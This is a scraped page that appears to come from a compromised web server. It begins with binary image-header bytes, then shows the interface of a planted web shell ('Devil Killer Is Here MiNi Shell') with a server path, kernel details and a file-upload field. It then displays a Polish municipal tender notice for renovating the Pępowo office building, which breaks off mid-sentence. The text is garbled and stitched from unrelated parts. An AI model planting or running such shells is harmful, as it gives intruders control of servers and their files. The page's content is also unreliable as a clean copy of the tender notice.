JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240910/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240910/0049311001-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Odnowienie elewacji oraz wymiana i odnowienie stolarki budynku Urzędu Gminy w Pępowie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA PĘPOWO</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 411050592</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisławy Nadstawek 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Pępowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">63-830</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ug@pepowo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pepowo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Odnowienie elewacji oraz wymiana i odnowienie stolarki budynku Urzędu Gminy w Pępowie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-45e2bba5-fb58-4915-b608-b0c8d01df537</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00493110</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00016396/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Odnowienie elewacji oraz wymiana i odnowienie stolarki budynku Urzędu Gminy w Pępowie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/pepowo <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/pepowo</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Oferta,<br/>wniosek oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą<br/>zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem<br/>osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na<br/>platformie, kwalifikowany podpis elektroniczny lub podpis zaufany lub podpis osobisty wykonawca<br/>składa bezpośrednio na dokumencie, który następnie przesyła do systemu. 2. Zamawiający, zgodnie z<br/>Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków<br/>komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U.<br/>z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platforma zakupowa.pl, tj.:a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 512 kb/s,b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB<br/>Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows<br/>7, Mac Os x 10 4, Linux, lub ich nowsze wersje,c) zainstalowana dowolna przeglądarka internetowa, w<br/>przypadku Internet Explorer minimalnie wersja 10 0.,d) włączona obsługa JavaScript,e) zainstalowany<br/>program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,f) Szyfrowanie na platforma<br/>zakupowa.pl odbywa się za pomocą protokołu TLS 1.3.g) Oznaczenie czasu odbioru danych przez<br/>platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego<br/>serwera synchronizowanego z zegarem Głównego Urzędu Miar.3. Podpisy kwalifikowane<br/>wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać<br/>“Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług<br/>zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014<br/>- od 1 lipca 2016 roku” W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający<br/>wymaga dołączenia odpowiedniej ilości plików tj. podpisywanych plików z danymi oraz plików podpisu<br/>w formacie XAdES.4. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem<br/>dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy<br/>komunikacji wielkość pliku to maksymalnie 500 MB.5. RFormaty plików wykorzystywanych przez wykonawców powinny być zgodne<br/>z “ROZPORZĄDZENIEM PREZESA RADY MINISTRÓW z dnia 21 maja 2024 r. w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych”:<br/>”6. W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między<br/>zamawiającym a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem platformazakupowa.pl i formularza „Wyślij<br/>wiadomość do zamawiającego”. W przypadku problemów technicznych związanych z obsługą<br/>platformazakupowa.pl Zamawiający dopuszcza kontakt przy użyciu poczty elektronicznej<br/>przetargi@pepowo.pl jako kanału pomocniczego w sytuacjach awaryjnych.6. Szczegółowe informacje<br/>techniczne i organizacyjne dot. korespondencji elektronicznej zawarto w rozdziale 6.5, 7 i 11 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami rozdziału 21 SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami rozdziału 21 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WRG.271.12.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont elewacji budynku przygotowany na podstawie badań konserwatorskich oraz zaleceń<br/>wydanych przez Wielkopolskiego Wojewódzkiego Konserwatora Zabytków. Prace konserwatorskie powinny dążyć możliwie<br/>do przywrócenia pierwotnego charakteru budynku z okresu jego powstania oraz poprawy walorów estetycznych i<br/>użytkowych z uwzględnieniem zachowania oryginalnej substancji. Zakresem opracowania objęto frontową zabytkową część<br/>gmachu Urzędu Gminy. Budynek Urzędu Gminy w Pępowie (stara część objęta postepowaniem) wpisany jest do rejestru<br/>zabytków decyzją Wojewódzkiego Konserwatora Zabytków z dnia 6.03.1970 r. pod nr rej. 971/A.<br/>Zakres rzeczowy zamówienia:<br/>a) Część I: Odnowienie elewacji budynku Urzędu Gminy w Pępowie<br/>- usunięcie nawarstwień mikrobiologicznych, smółki, sadzy i innych zanieczyszczeń,<br/>- wykonanie koniecznych przemurowań wraz z uzupełnieniem ubytków w cegłach i kształtkach oraz odtworzenie<br/>brakujących zapraw spoinujących;<br/>- odtworzenie uszkodzonego szkliwa<br/>- okazanie do oględzin organowi konserwatorskiemu elewacji zachodniej (tylnej) po skuciu tynku, przed przystąpieniem do<br/>dalszych prac przy tej części budynku<br/>Szczegółowy opis przedmiotu zamówienia zawierają dokumentacja projektowa i techniczna, przedmiary robót i specyfikacja<br/>techniczna wykonania i odbioru robót stanowiące Załącznik nr 8 i 9 do niniejszej SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45262690-4 - Remont starych budynków</p> <p class="mb-0">45211350-7 - Roboty budowlane w zakresie budynków wielofunkcyjnych</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium:<br/>15.1.1. Cena 60%<br/>15.1.2. Termin gwarancji i rękojmi 40%<br/>Razem 100 % = 100 pkt<br/>15.2. Ranking ofert przy uwzględnieniu ww. kryteriów ustalony będzie w skali do 100 punktów, w następujący sposób:<br/>P = Pc + Pg<br/>P = punkty za ofertę<br/>Pc = punkty za cenę<br/>Pg = punkty za termin gwarancji i rękojmi<br/>Punktacja:<br/>-punkty za cenę:<br/>Pc -ilość punktów za cenę,<br/>Pc = 60 % = 60pkt<br/>Pc = (Cncb/Cbob) x 60pkt x 100%, gdzie:<br/>Cncb -cena najniższa brutto wśród ofert niepodlegających odrzuceniu,<br/>Cbob -cena brutto oferty badanej<br/>-punkty za termin gwarancji i rękojmi:<br/>Pg –ilość punktów za termin gwarancji i rękojmi<br/>Pg = 40 % = 40 pkt<br/>Punktacja za termin gwarancji i rękojmi –gwarancja i rękojmia obejmuje:<br/>- 60 miesięcy = 0 pkt x 100% = 0 pkt<br/>- 72 miesięcy = 20 pkt x 100% =20 pkt<br/>- 84 miesięcy= 40 pkt x 100% = 40 pkt<br/>Wykonawca wskazuje ewentualne zaoferowanie dłuższego terminu gwarancji i rękojmi w załączniku nr 1 do SWZ –formularz oferty.<br/>Wykonawca chcący zaoferować wydłużony termin gwarancji i rękojmi wybiera odpowiedni punkt w formularzu oferty. Brak wpisu w<br/>formularzu oferty traktowany będzie jako oferowanie tylko i wyłącznie minimalnego 60 miesięcznego okresu gwarancji i rękojmi a<br/>Wykonawca otrzyma za kryterium gwarancji 0 pkt.<br/>15.3. Za najkorzystniejszą ofertę Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest remont elewacji budynku przygotowany na podstawie badań konserwatorskich oraz zaleceń<br/>wydanych przez Wielkopolskiego Wojewódzkiego Konserwatora Zabytków. Prace konserwatorskie powinny dążyć możliwie<br/>do przywrócenia pierwotnego charakteru budynku z okresu jego powstania oraz poprawy walorów estetycznych i<br/>użytkowych z uwzględnieniem zachowania oryginalnej substancji. Zakresem opracowania objęto frontową zabytkową część<br/>gmachu Urzędu Gminy. Budynek Urzędu Gminy w Pępowie (stara część objęta postepowaniem) wpisany jest do rejestru<br/>zabytków decyzją Wojewódzkiego Konserwatora Zabytków z dnia 6.03.1970 r. pod nr rej. 971/A.<br/>Część II: Wymiana i odnowienie stolarki budynku Urzędu Gminy w Pępowie<br/>- wykonanie, na wzór okien historycznych, nowych okien zgodnie ze współczesnymi normami; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45421132-8 - Instalowanie okien</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie kierował się następującym kryterium:<br/>15.1.1. Cena 60%<br/>15.1.2. Termin gwarancji i rękojmi 40%<br/>Razem 100 % = 100 pkt<br/>15.2. Ranking ofert przy uwzględnieniu ww. kryteriów ustalony będzie w skali do 100 punktów, w następujący sposób:<br/>P = Pc + Pg<br/>P = punkty za ofertę<br/>Pc = punkty za cenę<br/>Pg = punkty za termin gwarancji i rękojmi<br/>Punktacja:<br/>-punkty za cenę:<br/>Pc -ilość punktów za cenę,<br/>Pc = 60 % = 60pkt<br/>Pc = (Cncb/Cbob) x 60pkt x 100%, gdzie:<br/>Cncb -cena najniższa brutto wśród ofert niepodlegających odrzuceniu,<br/>Cbob -cena brutto oferty badanej<br/>-punkty za termin gwarancji i rękojmi:<br/>Pg –ilość punktów za termin gwarancji i rękojmi<br/>Pg = 40 % = 40 pkt<br/>Punktacja za termin gwarancji i rękojmi –gwarancja i rękojmia obejmuje:<br/>- 60 miesięcy = 0 pkt x 100% = 0 pkt<br/>- 72 miesięcy = 20 pkt x 100% =20 pkt<br/>- 84 miesięcy= 40 pkt x 100% = 40 pkt<br/>Wykonawca wskazuje ewentualne zaoferowanie dłuższego terminu gwarancji i rękojmi w załączniku nr 1 do SWZ –formularz oferty.<br/>Wykonawca chcący zaoferować wydłużony termin gwarancji i rękojmi wybiera odpowiedni punkt w formularzu oferty. Brak wpisu w<br/>formularzu oferty traktowany będzie jako oferowanie tylko i wyłącznie minimalnego 60 miesięcznego okresu gwarancji i rękojmi a<br/>Wykonawca otrzyma za kryterium gwarancji 0 pkt.<br/>15.3. Za najkorzystniejszą ofertę Zamawiający uzna ofertę z największą ilością punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki z art. 112 ust. 2 ustawy PZP,<br/>dotyczące:<br/>5.1.1. Część I zamówienia:<br/>a) Zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>b) Uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów.<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>c) Sytuacji ekonomicznej i finansowej<br/>Zamawiający nie określa minimalnych poziomów zdolności w zakresie niniejszego warunku udziału w postępowaniu.<br/>d) Zdolności technicznej lub zawodowej<br/>- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 5 lat przed upływem terminu<br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie wykonał co najmniej 1 robotę budowlaną<br/>polegającą na remoncie i/lub renowacji muru ceglanego obejmującym/ej usunięcie zanieczyszczeń z co najmniej 100 m2<br/>powierzchni.<br/>Wystarczające jest, aby dowolny Wykonawca/Wykonawcy wspólnie ubiegający się o zamówienie, wykazał spełnianie tego<br/>warunku,<br/>- Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że<br/>dysponuje lub będzie dysponował, zarówno na etapie udzielenia zamówienia, jak i jego realizacji osobami posiadającymi<br/>uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, określone przepisami ustawy z dnia 7 lipca<br/>1994 roku Prawo budowlane lub odpowiadające im ważne uprawnienia budowlane, w tym również wydane w trybie<br/>uznawania kwalifikacji zawodowych cudzoziemców , tj.:<br/>* kierownikiem budowy posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w specjalności<br/>architektonicznej lub konstrukcyjno-budowlanej oraz uprawnionego do kierowania pracami przy zabytkach nieruchomych<br/>(zgodnie z art. 37c ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami (tj. Dz. U. z 2022, poz. 840 z<br/>późn. zm.)) tj. kierownikiem budowy który przez co najmniej 18 miesięcy brał udział w robotach budowlanych prowadzonych<br/>przy zabytkach nieruchomych wpisanych do rejestru lub inwentarza muzeum będącego instytucją kultury,<br/>* kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami budowlanymi w branży elektrycznej,<br/>* kierownikiem prac konserwatorskich, który ukończył studia drugiego stopnia lub jednolite studia magisterskie, w zakresie<br/>konserwacji i restauracji dzieł sztuki lub konserwacji zabytków oraz który po rozpoczęciu studiów drugiego stopnia lub po<br/>zaliczeniu szóstego semestru jednolitych studiów magisterskich przez co najmniej 9 miesięcy brał udział w pracach<br/>konserwatorskich, pracach restauratorskich lub badaniach konserwatorskich, prowadzonych przy zabytkach wpisanych do<br/>rejestru, inwentarza muzeum będącego instytucją kultury lub zaliczanych do jednej z kategorii, o których mowa w art. 14a<br/>ust. 2 ustawy z dnia 23 lipca 2003 r. o ochronie zabytków i opiece nad zabytkami albo, w przypadku dziedzin nieobjętych<br/>programem studiów wyższych, który posiada świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo<br/>wykształcenie średnie 